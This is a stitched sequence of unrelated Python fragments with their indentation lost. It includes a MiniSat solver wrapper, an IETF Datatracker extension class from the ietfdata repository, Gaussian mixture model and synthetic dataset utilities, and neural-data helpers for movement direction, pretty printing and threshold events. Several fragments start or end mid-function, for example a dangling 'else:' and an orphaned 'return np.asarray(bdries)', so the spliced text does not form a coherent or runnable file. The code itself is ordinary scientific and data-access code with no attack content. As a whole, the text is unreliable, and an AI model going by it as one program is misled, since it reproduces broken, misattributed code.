def solve(self, assumptions=[]):
"""
Solve internal formula.
"""
if self.minisat:
if self.use_timer:
start_time = process_time()
self.status = pysolvers.minisatgh_solve(self.minisat, assumptions,
int(MainThread.check()))
if self.use_timer:
self.call_time = process_time() - start_time
self.accu_time += self.call_time
return self.status
def solve_limited(self, assumptions=[], expect_interrupt=False):
"""
Solve internal formula using given budgets for conflicts and
propagations.
"""
if self.minisat:
if self.use_timer:
start_time = process_time()
self.status = pysolvers.minisatgh_solve_lim(self.minisat,
assumptions, int(MainThread.check()), int(expect_interrupt))
if self.use_timer:
self.call_time = process_time() - start_time
self.accu_time += self.call_time
return self.status
def conf_budget(self, budget):
"""
Set limit on the number of conflicts.
"""
if self.minisat:
pysolvers.minisatgh_cbudget(self.minisat, budget)
def prop_budget(self, budget):
"""
Set limit on the number of propagations.
"""
if self.minisat:
pysolvers.minisatgh_pbudget(self.minisat, budget)
def interrupt(self):
"""
Interrupt solver execution.
"""
if self.minisat:
pysolvers.minisatgh_interrupt(self.minisat)
def clear_interrupt(self):
"""
Clears an interruption.
"""
if self.minisat:
pysolvers.minisatgh_clearint(self.minisat)
def propagate(self, assumptions=[], phase_saving=0):
"""
Propagate a given set of assumption literals.
"""
if self.minisat:
if self.use_timer:
start_time = process_time()
st, props = pysolvers.minisatgh_propagate(self.minisat,
assumptions, phase_saving, int(MainThread.check()))
if self.use_timer:
self.call_time = process_time() - start_time
self.accu_time += self.call_time
return bool(st), props if props != None else []
def set_phases(self, literals=[]):
"""
Sets polarities of a given list of variables.
"""
if self.minisat:
pysolvers.minisatgh_setphases(self.minisat, literals)
def get_status(self):
"""
Returns solver's status.
"""
if self.minisat:
return self.status
def get_model(self):
"""
Get a model if the formula was previously satisfied.
"""
if self.minisat and self.status == True:
model = pysolvers.minisatgh_model(self.minisat)
return model if model != None else []
| |
<reponame>glasgow-ipl/ietfdata
# Copyright (C) 2020-2021 University of Glasgow
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from datetime import datetime, timedelta
from ietfdata.datatracker import *
from ietfdata.rfcindex import *
# =================================================================================================================================
# Private helper functions
def names_to_try(name: str, email: str) -> List[str]:
names = []
# Derive alternative names to try:
if name != "":
names.append(name)
split = name.split()
# If given, e.g., "<NAME>" also try "<NAME>":
if len(split) == 3 and len(split[1]) == 2 and split[1][0].isalpha() and split[1][1] == ".":
alias = split[0] + " " + split[2]
names.append(alias)
# If given, e.g., "<NAME>" also try "<NAME>::
if len(split) == 2 and len(split[0]) >= 2 and split[0][-1] == ",":
alias = split[1] + " " + split[0][:-1]
names.append(alias)
# If given, e.g. "<NAME> (csperkins)" also try "<NAME>":
if len(split) == 3 and len(split[2]) >= 2 and split[2][0] == "(" and split[2][-1] == ")":
alias = split[0] + " " + split[1]
names.append(alias)
# Derive names from the email address:
if "@" in email:
local, remote = email.split("@")
if local.endswith(".ietf") or local.endswith("-ietf") or local.endswith("+ietf"):
local = local[:-5]
split = local.split(".")
# If given, e.g., "<EMAIL>" also try "<NAME>":
if len(split) == 2 and len(split[0]) > 1 and len(split[1]) > 1:
alias = split[0][0].upper() + split[0][1:] + " " + split[1][0].upper() + split[1][1:]
names.append(alias)
# If given, e.g., "<EMAIL>" also try "<NAME>" and "<NAME>":
if len(split) == 3 and len(split[0]) > 1 and len(split[1]) == 1 and len(split[2]) > 1:
alias = split[0][0].upper() + split[0][1:] + " " + split[1].upper() + ". " + split[2][0].upper() + split[2][1:]
names.append(alias)
alias = split[0][0].upper() + split[0][1:] + " " + split[2][0].upper() + split[2][1:]
names.append(alias)
return names
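# Example (hedged; the name and address are hypothetical):
#   names_to_try("John A. Smith", "john.smith@example.org")
#   -> ["John A. Smith", "John Smith", "John Smith"]
# Note that the helper does not deduplicate the aliases it derives.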
# =================================================================================================================================
@dataclass
class DraftHistory:
draft : Document
rev : str
date : datetime
submission : Optional[Submission]
class DataTrackerExt(DataTracker):
"""
The `DataTrackerExt` class extends the `DataTracker` with methods that
perform complex queries across multiple API endpoints.
"""
def __init__(self,
use_cache: bool = False,
mongodb_hostname: str = "localhost",
mongodb_port: int = 27017,
mongodb_username: Optional[str] = None,
mongodb_password: Optional[str] = None):
super().__init__(use_cache, mongodb_hostname, mongodb_port, mongodb_username, mongodb_password)
def draft_history(self, draft: Document, drafts_seen: List[Document] = []) -> List[DraftHistory]:
"""
Find the previous versions of an Internet-Draft
"""
assert draft.type == DocumentTypeURI("/api/v1/name/doctypename/draft/")
drafts : List[DraftHistory] = []
if draft in drafts_seen:
return []
else:
drafts_seen.append(draft)
# Step 1: Use document_events() to find previous versions of the draft.
for event in self.document_events(doc=draft, event_type="new_revision"):
drafts.append(DraftHistory(draft, event.rev, event.time, None))
# Step 2: Find the submissions, and add them to the previously found
# draft versions. Some versions of a draft may not have a submission.
# While we're doing this, record any drafts the submissions are marked
# as replacing.
submissions : List[Submission] = []
replaces : List[Document] = []
for submission_uri in draft.submissions:
submission = self.submission(submission_uri)
if submission is not None:
submissions.append(submission)
if submission.replaces != "":
for replaces_draft in submission.replaces.split(","):
replaces_doc = self.document_from_draft(replaces_draft)
if replaces_doc is not None:
found = False
for r in replaces:
if r.name == replaces_doc.name:
found = True
break
if not found:
replaces.append(replaces_doc)
for submission in submissions:
found = False
for d in drafts:
if d.draft.resource_uri == submission.draft and d.rev == submission.rev:
d.submission = submission
found = True
break
if not found:
drafts.append(DraftHistory(draft, submission.rev, submission.submission_date, submission))
# Step 3: Use related_documents() to find additional drafts this replaces:
for related in self.related_documents(source=draft, relationship_type=self.relationship_type_from_slug("replaces")):
alias = self.document_alias(related.target)
if alias is not None:
reldoc = self.document(alias.document)
if reldoc is not None:
found = False
for r in replaces:
if r.name == reldoc.name:
found = True
break
if not found:
replaces.append(reldoc)
# Step 4: Process the drafts this replaces, to find earlier versions:
for r in replaces:
if r.name != draft.name:
drafts.extend(self.draft_history(r, drafts_seen=drafts_seen))
return list(reversed(sorted(drafts, key=lambda d: d.date)))
def draft_history_for_rfc(self, rfc: RfcEntry) -> List[DraftHistory]:
"""
Use the DataTracker to find the draft versions of a given RFC.
The `RfcEntry` contains a `draft` field that (usually) points to the
final draft before the document became an RFC. This function follows
the history of the document back to the original submission to find
all prior drafts.
Note that earlier RFCs and "April Fools" RFCs do not exist in draft
form, so this may return an empty list.
"""
final_draft = None
if rfc.draft is not None:
final_draft = self.document_from_draft(rfc.draft[:-3])
if final_draft is None:
final_draft = self.document_from_rfc(rfc.doc_id)
else:
final_draft = self.document_from_rfc(rfc.doc_id)
if final_draft is not None:
return self.draft_history(final_draft)
else:
return []
def iab_chair(self) -> Person:
chairs = list(self.group_roles(group = self.group_from_acronym("iab"), name = self.role_name_from_slug("chair")))
assert(len(chairs) == 1) # There is only one IAB chair
chair = self.person(chairs[0].person)
assert chair is not None
return chair
def iab_members(self) -> Iterator[Person]:
for member in self.group_roles(group = self.group_from_acronym("iab"), name = self.role_name_from_slug("member")):
person = self.person(member.person)
assert person is not None
yield person
def ietf_chair(self) -> Person:
chairs = list(self.group_roles(group = self.group_from_acronym("ietf"), name = self.role_name_from_slug("chair")))
assert(len(chairs) == 1) # There is only one IETF chair
chair = self.person(chairs[0].person)
assert chair is not None
return chair
def iesg_members(self) -> Iterator[Person]:
for member in self.group_roles(group = self.group_from_acronym("iesg"), name = self.role_name_from_slug("ad")):
person = self.person(member.person)
assert person is not None
yield person
def irtf_chair(self) -> Person:
chairs = list(self.group_roles(group = self.group_from_acronym("irtf"), name = self.role_name_from_slug("chair")))
assert(len(chairs) == 1) # There is only one IRTF chair
chair = self.person(chairs[0].person)
assert chair is not None
return chair
def irsg_members(self) -> Iterator[Person]:
for member in self.group_roles(group = self.group_from_acronym("irsg")):
person = self.person(member.person)
assert person is not None
yield person
def active_research_groups(self) -> Iterator[Group]:
active_state = self.group_state_from_slug("active")
research_group = self.group_type_name_from_slug("rg")
for group in self.groups(parent = self.group_from_acronym("irtf")):
t = self.group_type_name(group.type)
s = self.group_state(group.state)
if s == active_state and t == research_group:
yield group
def research_group_chairs(self) -> Iterator[Person]:
chair = self.role_name_from_slug("chair")
chairs = set()
for group in self.active_research_groups():
for role in self.group_roles(group = group, name = chair):
person = self.person(role.person)
assert person is not None
if person.id not in chairs: # people can chair more than one group
chairs.add(person.id)
yield person
def concluded_research_groups(self) -> Iterator[Group]:
concluded_state = self.group_state_from_slug("conclude")
research_group = self.group_type_name_from_slug("wg")
for group in self.groups(parent = self.group_from_acronym("irtf")):
t = self.group_type_name(group.type)
s = self.group_state(group.state)
if s == concluded_state and t == research_group:
yield group
def active_working_groups(self) -> Iterator[Group]:
active_state = self.group_state_from_slug("active")
working_group = self.group_type_name_from_slug("wg")
for area in self.groups(parent = self.group_from_acronym("iesg")):
if self.group_state(area.state) == active_state:
for group in self.groups(parent = area):
t = self.group_type_name(group.type)
s = self.group_state(group.state)
if s == active_state and t == working_group:
yield group
def working_group_chairs(self) -> Iterator[Person]:
chair = self.role_name_from_slug("chair")
chairs = set()
for group in self.active_working_groups():
for role in self.group_roles(group = group, name = chair):
person = self.person(role.person)
assert person is not None
if person.id not in chairs: # people can chair more than one group
chairs.add(person.id)
yield person
def next_ietf_meeting(self) -> Optional[Meeting]:
"""
Return the next upcoming, or currently ongoing, IETF meeting.
"""
next_meeting = None
for meeting in self.meetings(meeting_type = self.meeting_type_from_slug("ietf")):
if meeting.status() == MeetingStatus.ONGOING:
next_meeting = meeting
break
elif meeting.status() == MeetingStatus.FUTURE:
if next_meeting is None or meeting.date < next_meeting.date:
next_meeting = meeting
return next_meeting
X = newCluster
else:
X = np.append(X,newCluster,axis=0)
if normalize is not None:
if normalize in ['l_2-unit-ball']:
maxNorm = np.linalg.norm(X,axis=1).max() + 1e-6 # plus smth to have no round error
elif normalize in ['l_inf-unit-ball']:
maxNorm = np.abs(X).max() + 1e-6
else:
raise Exception('Unrecognized normalization method ({}). Aborting.'.format(normalize))
# Normalize by maxNorm
X /= maxNorm
return X
def generateSpiralDataset(n,normalize=None,return_density=False):
"""
Generate a synthetic 2-D dataset made of a spiral.
Parameters
----------
n: int, the number of elements in the dataset (cardinality)
normalize: string (default=None), if not None describes how to normalize the dataset. Available options:
- 'l_2-unit-ball': the dataset is scaled in the l_2 unit ball (i.e., all l_2 norms are <= 1)
- 'l_inf-unit-ball': the dataset is projected in the l_inf unit ball (i.e., all entries are <= 1)
return_density: bool (default=False), if True the spiral's probability density function is returned as well
Returns
-------
out: X: (n,d)-numpy array containing the samples (a tuple (X,pdf) if return_density is True).
"""
## Initialization
X = None
# Spiral parameters
n_spirals = 1
min_radius = 0.3
delta_radius_per_spiral = 1.2
radius_noise = 0.01
# parameter
t = np.random.uniform(0,n_spirals,n)
Rs = min_radius + delta_radius_per_spiral*t + radius_noise*np.random.randn(n)
thetas = np.remainder(2*np.pi*t,2*np.pi)
x1 = np.expand_dims(np.cos(thetas)*Rs,axis=1)
x2 = np.expand_dims(np.sin(thetas)*Rs,axis=1)
X = np.concatenate((x1,x2),axis=1)
maxNorm = 1
if normalize is not None:
if normalize in ['l_2-unit-ball']:
maxNorm = np.linalg.norm(X,axis=1).max() + 1e-6 # plus smth to have no round error
elif normalize in ['l_inf-unit-ball']:
maxNorm = np.abs(X).max() + 1e-6
else:
raise Exception('Unrecognized normalization method ({}). Aborting.'.format(normalize))
# Normalize by maxNorm
X /= maxNorm
# Compute the density function too
def pdf(x):
# Compute polar coordinates TODO SUPPORT FOR N SPIRALS > 1
x1 = x[0] * maxNorm
x2 = x[1] * maxNorm
r = np.sqrt(x1**2+x2**2)
th = np.arctan2(x2,x1)
if th<0:
th += 2*np.pi
return (1/(2*np.pi)) * (scipy.stats.norm.pdf(r, loc=min_radius + delta_radius_per_spiral*th/(2*np.pi), scale=radius_noise)) / r # First part comes from theta, second from R
if return_density:
return (X,pdf)
return X
def generatedataset_Ksparse(d,K,n,max_radius=1):
"""
Generate a synthetic dataset of K-sparse vectors in dimension d, with l_2 norm <= max_radius.
Parameters
----------
d: int, the dataset dimension
K: int, the sparsity level (vectors have at most K nonzero entries)
n: int, the number of elements in the dataset (cardinality)
max_radius: real>0, vectors are drawn uniformly in the l_2 ball of radius max_radius
Returns
-------
X: (n,d)-numpy array containing the samples
"""
# Random points in a ball
r = max_radius*(np.random.uniform(0,1,size=n)**(1/K)) # Radius; the K-th root gives a uniform density in the K-dimensional ball
v = np.random.randn(n,d) # Random direction
X = (v.T*(1/np.linalg.norm(v,axis=1))*r).T
# Random support (sets to zero the coefficients not in the support)
for i in range(n):
X[i,np.random.permutation(d)[K:]] = 0
return X
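# Minimal usage sketch for generatedataset_Ksparse (illustrative addition, not part
# of the original module; assumes numpy imported as np, as elsewhere in this file):
def _demo_ksparse():
    X = generatedataset_Ksparse(d=10, K=3, n=5, max_radius=1)
    assert (np.count_nonzero(X, axis=1) <= 3).all()       # at most K nonzero entries per row
    assert (np.linalg.norm(X, axis=1) <= 1 + 1e-9).all()  # every sample lies in the l_2 ball
    return X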
############################
# METHODS #
############################
def EM_GMM(X, K, max_iter=20, nRepetitions=1):
"""Usual Expectation-Maximization (EM) algorithm for fitting mixture of Gaussian models (GMM).
Parameters
----------
X: (n,d)-numpy array, the dataset of n examples in dimension d
K: int, the number of Gaussian modes
Additional Parameters
---------------------
max_iter: int (default 20), the number of EM iterations to perform
nRepetitions: int (default 1), number of independent EM runs to perform (returns the best)
Returns: a tuple (w,mus,Sigmas) of three numpy arrays
- w: (K,) -numpy array containing the weights ('mixing coefficients') of the Gaussians
- mus: (K,d) -numpy array containing the means of the Gaussians
- Sigmas: (K,d,d)-numpy array containing the covariance matrices of the Gaussians
"""
# TODO to improve:
# - detect early convergence
# Parse input
(n,d) = X.shape
lowb = np.amin(X,axis=0)
uppb = np.amax(X,axis=0)
bestGMM = None
bestScore = -np.inf
for rep in range(nRepetitions):
# Initializations
w = np.ones(K)
mus = np.empty((K,d))
Sigmas = np.empty((K,d,d)) # Covariances are initialized as random diagonal covariances, with folded Gaussian values
for k in range(K):
mus[k] = np.random.uniform(lowb,uppb)
Sigmas[k] = np.diag(np.abs(np.random.randn(d)))
r = np.empty((n,K)) # Matrix of posterior probabilities, here memory allocation only
# Main loop
for i in range(max_iter):
# E step
for k in range(K):
r[:,k] = w[k]*scipy.stats.multivariate_normal.pdf(X, mean=mus[k], cov=Sigmas[k],allow_singular=True)
r = (r.T/np.sum(r,axis=1)).T # Normalize (the posterior probabilities sum to 1). Dirty :-(
# M step: 1) update w
w = np.sum(r,axis=0)/n
# M step: 2) update centers
for k in range(K):
mus[k] = r[:,k]@X/np.sum(r[:,k])
# M step: 3) update Sigmas
for k in range(K):
# Dumb implementation
num = np.zeros((d,d))
for j in range(n): # j (not i) to avoid shadowing the EM iteration counter
num += r[j,k]*np.outer(X[j]-mus[k],X[j]-mus[k])
Sigmas[k] = num/np.sum(r[:,k])
# (end of one EM iteration)
# (end of one EM run)
newGMM = (w,mus,Sigmas)
newScore = loglikelihood_GMM(newGMM,X)
if newScore > bestScore:
bestGMM = newGMM
bestScore = newScore
return bestGMM
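# Hedged usage sketch (illustrative only): fit a small GMM on spiral data and keep
# the best of three random restarts, scored by the average loglikelihood.
def _demo_em_gmm():
    X = generateSpiralDataset(1000, normalize='l_2-unit-ball')
    w, mus, Sigmas = EM_GMM(X, K=4, max_iter=30, nRepetitions=3)
    return loglikelihood_GMM((w, mus, Sigmas), X)  # higher is better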
############################
# METRICS #
############################
def SSE(X,C):
"""Computes the Sum of Squared Errors of some centroids on a dataset, given by
SSE(X,C) = sum_{x_i in X} min_{c_k in C} ||x_i-c_k||_2^2.
Arguments:
- X: (n,d)-numpy array, the dataset of n examples in dimension d
- C: (K,d)-numpy array, the K centroids in dimension d
Returns:
- SSE: real, the SSE score defined above
"""
distances = scipy.spatial.distance.cdist(X, C, 'sqeuclidean')
return np.min(distances,axis=1).sum()
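# Sanity-check sketch for SSE (illustrative addition): with a single centroid placed
# at the data mean, the SSE equals the total sum of squared deviations from the mean.
def _demo_sse():
    X = np.random.randn(100, 2)
    C = X.mean(axis=0, keepdims=True)   # one centroid, at the mean
    return np.isclose(SSE(X, C), ((X - C) ** 2).sum())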
def loglikelihood_GMM(P,X,robust = True):
"""Computes the loglikelihood of GMM model P on data X, defined as follows:
loglikelihood = (1/n) * sum_{i=1..n} log(sum_{k=1..K} (w_k)*N(x_i ; mu_k, Sigma_k) )
Arguments:
- P: tuple of three numpy arrays describing the GMM model of form (w,mus,Sigmas)
- w : (K,)-numpy array, the weights of the K Gaussians (should sum to 1)
- mus : (K,d)-numpy array containing the means of the Gaussians
- Sigmas : (K,d,d)-numpy array containing the covariance matrices of the Gaussians
- X: (n,d)-numpy array, the dataset of n examples in dimension d
- robust: bool (default = True), if True, avoids -inf output due to very small probabilities
(note: execution will be slower)
Returns:
- loglikelihood: real, the loglikelihood value defined above
"""
# Unpack
(w,mu,Sig) = P
(K,d) = mu.shape
logp = np.zeros(X.shape[0])
p = np.zeros(X.shape[0])
try:
for k in range(K):
p += w[k]*scipy.stats.multivariate_normal.pdf(X, mean=mu[k], cov=Sig[k], allow_singular=False)
with np.errstate(divide='ignore'): # ignore divide by zero warning
logp = np.log(p)
except np.linalg.LinAlgError:
if robust:
b = np.zeros(K)
a = np.zeros(K)
Sig_inv = np.zeros(Sig.shape)
for k in range(K):
a[k] = w[k]*((2*np.pi)**(-d/2))*(np.linalg.det(Sig[k])**(-1/2))
Sig_inv[k] = np.linalg.inv(Sig[k])
for i in range(p.size): # Replace the inf values due to rounding p to 0
for k in range(K):
b[k] = -(X[i]-mu[k])@Sig_inv[k]@(X[i]-mu[k])/2
lc = b.max()
ebc = np.exp(b-lc)
logp[i] = np.log(ebc@a) + lc
else:
raise np.linalg.LinAlgError('singular matrix')
return np.mean(logp)
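# Note on the robust branch above: it is the standard log-sum-exp trick,
#   log(sum_k a_k*exp(b_k)) = log(sum_k a_k*exp(b_k - c)) + c   with c = max_k b_k,
# which stays finite even when every exp(b_k) underflows to zero.
# A minimal standalone check (illustrative addition, not part of the original module):
def _demo_logsumexp():
    a = np.array([0.5, 0.5])
    b = np.array([-1000.0, -1001.0])      # np.exp(b) underflows to exactly 0.0
    c = b.max()
    return np.log(np.exp(b - c) @ a) + c  # finite, whereas np.log(np.exp(b) @ a) is -inf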
def symmKLdivergence_GMM(P1,P2,Neval = 500000):
"""Computes the symmetric KL divergence between two GMM densities."""
# TODO : a version that adapts Neval s.t. convergence?
# Unpack
(w1,mu1,Sig1) = P1
(w2,mu2,Sig2) = P2
K1 = w1.size
K2 = w2.size
# Neval: number of Monte-Carlo samples used to estimate the KL divergence
# dumb implem for now, TODO FAST IMPLEM!
KLestimate = 0.
assignations1 = np.random.choice(K1,Neval,p=w1)
for k1 in range(K1):
N1 = np.count_nonzero(assignations1 == k1)
Y = np.random.multivariate_normal(mu1[k1], Sig1[k1], N1)
P1 = np.zeros(N1)
for k in range(K1):
P1 += w1[k]*scipy.stats.multivariate_normal.pdf(Y, mean=mu1[k], cov=Sig1[k], allow_singular=True)
P2 = np.zeros(N1)
for k in range(K2):
P2 += w2[k]*scipy.stats.multivariate_normal.pdf(Y, mean=mu2[k], cov=Sig2[k], allow_singular=True)
# Avoid numerical instabilities
P2[np.where(P2<=1e-25)[0]] = 1e-25
KLestimate += np.sum(np.log(P1/P2))
assignations2 = np.random.choice(K2,Neval,p=w2)
for k2 in range(K2):
N2 = np.count_nonzero(assignations2 == k2)
Y = np.random.multivariate_normal(mu2[k2], Sig2[k2], N2)
P1 = np.zeros(N2)
for k in range(K1):
P1 += w1[k]*scipy.stats.multivariate_normal.pdf(Y, mean=mu1[k], cov=Sig1[k], allow_singular=True)
P2 = np.zeros(N2)
for k in range(K2):
P2 += w2[k]*scipy.stats.multivariate_normal.pdf(Y, mean=mu2[k], cov=Sig2[k], allow_singular=True)
# Avoid numerical instabilities
P1[np.where(P1<=1e-25)[0]] = 1e-25
KLestimate += np.sum(np.log(P2/P1))
KLestimate /= 2*Neval
return KLestimate
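# Hedged usage sketch: the symmetric KL divergence of a GMM with itself should come
# out near zero, up to Monte-Carlo noise (illustrative addition):
def _demo_symm_kl():
    w = np.array([0.5, 0.5])
    mus = np.array([[-1.0, 0.0], [1.0, 0.0]])
    Sigmas = np.array([np.eye(2), np.eye(2)])
    P = (w, mus, Sigmas)
    return symmKLdivergence_GMM(P, P, Neval=10000)  # approximately 0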
############################
# VISUALIZATION #
############################
from matplotlib.patches import Ellipse
from scipy.stats import chi2
def plotGMM(X=None,P=None,dims=(0,1),d=2,proportionInGMM = None):
"""
Plots a Gaussian mixture model (and associated data) in 2 dimensions.
Parameters
----------
X: (n,d)-numpy array, the dataset of n examples in dimension d (optional)
P: a tuple (w,mus,Sigmas) of three numpy arrays describing the Gaussian mixture model, where
- w: (K,) -numpy array containing the weights ('mixing coefficients') of the Gaussians
- mus: (K,d) -numpy array containing the means of the Gaussians
return np.asarray(bdries)
def get_direction(asa, *, sigma=None):
"""Return epochs during which an animal was running left to right, or right
to left.
Parameters
----------
asa : AnalogSignalArray 1D
AnalogSignalArray containing the 1D position data.
sigma : float, optional
Smoothing to apply to position (x) before computing gradient estimate.
Default is 0.
Returns
-------
l2r, r2l : EpochArrays
EpochArrays corresponding to left-to-right and right-to-left movement.
"""
if sigma is None:
sigma = 0
if not isinstance(asa, core.AnalogSignalArray):
raise TypeError('AnalogSignalArray expected!')
assert asa.n_signals == 1, "1D AnalogSignalArray expected!"
direction = dxdt_AnalogSignalArray(asa.smooth(sigma=sigma),
rectify=False).data
direction[direction>=0] = 1
direction[direction<0] = -1
direction = direction.squeeze()
l2r = get_contiguous_segments(np.argwhere(direction>0).squeeze(), step=1)
l2r[:,1] -= 1 # change bounds from [inclusive, exclusive] to [inclusive, inclusive]
l2r = core.EpochArray(asa.abscissa_vals[l2r])
r2l = get_contiguous_segments(np.argwhere(direction<0).squeeze(), step=1)
r2l[:,1] -= 1 # change bounds from [inclusive, exclusive] to [inclusive, inclusive]
r2l = core.EpochArray(asa.abscissa_vals[r2l])
return l2r, r2l
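# Illustrative usage sketch (assumption: `pos` is a 1D nelpy AnalogSignalArray of
# animal position; the variable and the smoothing value are hypothetical):
#
#     l2r, r2l = get_direction(pos, sigma=0.1)  # split into L->R and R->L epochs
#     pos_l2r = pos[l2r]                        # restrict the signal to L->R runs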
class PrettyBytes(int):
"""Prints number of bytes in a more readable format"""
def __init__(self, val):
self.val = val
def __str__(self):
if self.val < 1024:
return '{} bytes'.format(self.val)
elif self.val < 1024**2:
return '{:.3f} kilobytes'.format(self.val/1024)
elif self.val < 1024**3:
return '{:.3f} megabytes'.format(self.val/1024**2)
elif self.val < 1024**4:
return '{:.3f} gigabytes'.format(self.val/1024**3)
def __repr__(self):
return self.__str__()
class PrettyInt(int):
"""Prints integers in a more readable format"""
def __init__(self, val):
self.val = val
def __str__(self):
return '{:,}'.format(self.val)
def __repr__(self):
return '{:,}'.format(self.val)
class PrettyDuration(float):
"""Time duration with pretty print.
Behaves like a float, and can always be cast to a float.
"""
def __init__(self, seconds):
self.duration = seconds
def __str__(self):
return self.time_string(self.duration)
def __repr__(self):
return self.time_string(self.duration)
@staticmethod
def to_dhms(seconds):
"""convert seconds into hh:mm:ss:ms"""
pos = seconds >= 0
if not pos:
seconds = -seconds
ms = seconds % 1; ms = round(ms*10000)/10
seconds = floor(seconds)
m, s = divmod(seconds, 60)
h, m = divmod(m, 60)
d, h = divmod(h, 24)
Time = namedtuple('Time', 'pos dd hh mm ss ms')
time = Time(pos=pos, dd=d, hh=h, mm=m, ss=s, ms=ms)
return time
@staticmethod
def time_string(seconds):
"""returns a formatted time string."""
if np.isinf(seconds):
return 'inf'
pos, dd, hh, mm, ss, ms = PrettyDuration.to_dhms(seconds)
if ms > 0:
if mm == 0:
# in this case, represent milliseconds in terms of
# seconds (i.e. a decimal)
sstr = str(ms/1000).lstrip('0')
if ms >= 999.5:
ss += 1
ms = 0
sstr = ""
# now propagate the carry:
if ss == 60:
mm += 1
ss = 0
if mm == 60:
hh += 1
mm = 0
if hh == 24:
dd += 1
hh = 0
else:
# for all other cases, milliseconds will be represented
# as an integer
if ms >= 999.5:
ss += 1
ms = 0
sstr = ""
# now propagate the carry:
if ss == 60:
mm += 1
ss = 0
if mm == 60:
hh += 1
mm = 0
if hh == 24:
dd += 1
hh = 0
else:
sstr = ":{:03d}".format(int(ms))
else:
sstr = ""
if dd > 0:
daystr = "{:01d} days ".format(dd)
else:
daystr = ""
if hh > 0:
timestr = daystr + "{:01d}:{:02d}:{:02d}{} hours".format(hh, mm, ss, sstr)
elif mm > 0:
timestr = daystr + "{:01d}:{:02d}{} minutes".format(mm, ss, sstr)
elif ss > 0:
timestr = daystr + "{:01d}{} seconds".format(ss, sstr)
else:
timestr = daystr + "{} milliseconds".format(ms)
if not pos:
timestr = "-" + timestr
return timestr
def __add__(self, other):
"""a + b"""
return PrettyDuration(self.duration + other)
def __radd__(self, other):
"""b + a"""
return self.__add__(other)
def __sub__(self, other):
"""a - b"""
return PrettyDuration(self.duration - other)
def __rsub__(self, other):
"""b - a"""
return other - self.duration
def __mul__(self, other):
"""a * b"""
return PrettyDuration(self.duration * other)
def __rmul__(self, other):
"""b * a"""
return self.__mul__(other)
def __truediv__(self, other):
"""a / b"""
return PrettyDuration(self.duration / other)
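# Usage sketch for the pretty-printing helpers above (expected output in comments):
def _demo_pretty():
    print(PrettyBytes(12582912))    # 12.000 megabytes
    print(PrettyInt(1234567))       # 1,234,567
    print(PrettyDuration(3671.25))  # 1:01:11:250 hours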
def shrinkMatColsTo(mat, numCols):
"""Shrinks an NxM1 matrix down to an NxM2 matrix (M2 <= M1) by linearly
interpolating each row to the requested number of columns."""
import scipy.ndimage
numCells = mat.shape[0]
numColsMat = mat.shape[1]
a = np.zeros((numCells, numCols))
for row in np.arange(numCells):
a[row,:] = scipy.ndimage.zoom(input=mat[row,:], zoom=(numCols/numColsMat), order=1)
return a
def find_threshold_crossing_events(x, threshold, *, mode='above'):
"""Find threshold crossing events. INCLUSIVE
Parameters
----------
x : numpy array
Input data
threshold : float
The value whose crossing triggers an event
mode : string, optional in ['above', 'below']; default 'above'
event triggering above, or below threshold
Returns
-------
eventlist : list
List containing the indices corresponding to threshold crossings
eventmax : list
List containing the maximum value of each event
"""
from itertools import groupby
from operator import itemgetter
if mode == 'below':
cross_threshold = np.where(x <= threshold, 1, 0)
elif mode == 'above':
cross_threshold = np.where(x >= threshold, 1, 0)
else:
raise NotImplementedError(
"mode {} not understood for find_threshold_crossing_events".format(str(mode)))
eventlist = []
eventmax = []
for k,v in groupby(enumerate(cross_threshold),key=itemgetter(1)):
if k:
v = list(v)
eventlist.append([v[0][0],v[-1][0]])
try:
eventmax.append(x[v[0][0]:(v[-1][0]+1)].max())
except Exception:
print(v, x[v[0][0]:v[-1][0]])
eventmax = np.asarray(eventmax)
eventlist = np.asarray(eventlist)
return eventlist, eventmax
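# Usage sketch (illustrative addition): find the inclusive index bounds of
# above-threshold events in a small signal.
def _demo_threshold_events():
    x = np.array([0., 0., 2., 3., 1., 0., 4., 0.])
    events, maxes = find_threshold_crossing_events(x, threshold=2, mode='above')
    # events -> [[2, 3], [6, 6]]; maxes -> [3., 4.]
    return events, maxes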
def get_events_boundaries(x, *, PrimaryThreshold=None,
SecondaryThreshold=None,
minThresholdLength=None, minLength=None,
maxLength=None, ds=None, mode='above'):
"""get event boundaries such that event.max >= PrimaryThreshold
and the event extent is defined by SecondaryThreshold.
Note that when PrimaryThreshold==SecondaryThreshold, then this is a
simple threshold crossing algorithm.
NB. minLength and maxLength are applied to the SecondaryThreshold
events, whereas minThresholdLength is applied to the
PrimaryThreshold events.
Parameters
----------
x : numpy array
Input data
mode : string, optional in ['above', 'below']; default 'above'
event triggering above, or below threshold
PrimaryThreshold : float, optional
If mode=='above', requires that event.max >= PrimaryThreshold
If mode=='below', requires that event.min <= PrimaryThreshold
SecondaryThreshold : float, optional
The value that defines the event extent
minThresholdLength : float, optional
Minimum duration for which the PrimaryThreshold is crossed
minLength : float, optional
Minimum duration for which the SecondaryThreshold is crossed
maxLength : float, optional
Maximum duration for which the SecondaryThreshold is crossed
ds : float, optional
Time step of the input data x
Returns
-------
returns bounds, maxes, events
where bounds <==> SecondaryThreshold to SecondaryThreshold, inclusive
maxes <==> maximum value during each event
events <==> PrimaryThreshold to PrimaryThreshold, inclusive
"""
# TODO: x must be a numpy array
